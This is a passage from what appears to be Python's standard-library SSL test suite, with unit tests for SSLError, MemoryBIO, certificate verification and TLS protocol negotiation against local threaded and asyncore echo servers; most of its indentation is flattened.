self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
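# ssl.MemoryBIO is an in-memory byte buffer; a pair of them lets an
# SSLObject run the TLS state machine without a real socket, with the
# caller shuttling bytes between the BIOs and the transport itself.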
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
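        # Enter the server's context manager by hand so that addCleanup()
        # tears it down even when an individual test fails part-way through.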
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop. Call func(*args) repeatedly; depending on the
        # error we get (WANT_READ or WANT_WRITE), move data between the
        # socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
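        # Drive a client-side SSLObject over a MemoryBIO pair: connect a
        # plain TCP socket, complete the handshake via ssl_io_loop(), check
        # the negotiated state, then unwrap() for an orderly TLS shutdown.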
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
        # should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
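    # A small threaded TLS echo server used as the peer for the networked
    # tests below: each accepted connection is handled in its own thread,
    # optionally upgraded via STARTTLS, and echoes received data lowercased.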
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
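# Note (added for context, not in the original file): asyncore, which this
# echo server is built on, was deprecated in later CPython releases and
# removed in Python 3.12, so this helper only applies to the interpreter
# versions this test file targets.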
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
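# Usage sketch (not in the original file): a minimal call mirrors what the
# test_compression()/test_dh_params() methods below do, e.g.
#
#     context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
#     context.load_cert_chain(CERTFILE)
#     stats = server_params_test(context, context, chatty=False)
#     stats['cipher'], stats['version'], stats['session_reused']
#
# The returned dict bundles the client-side view of the handshake plus the
# NPN/ALPN and shared-cipher lists collected by the ThreadedEchoServer.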
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
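# Usage sketch (not in the original file): the three shapes of *expect_success*
# exercised by the test_protocol_*() methods below are
#
#     try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')   # must negotiate TLSv1
#     try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)    # must connect, any version
#     try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)   # must fail to connect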
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
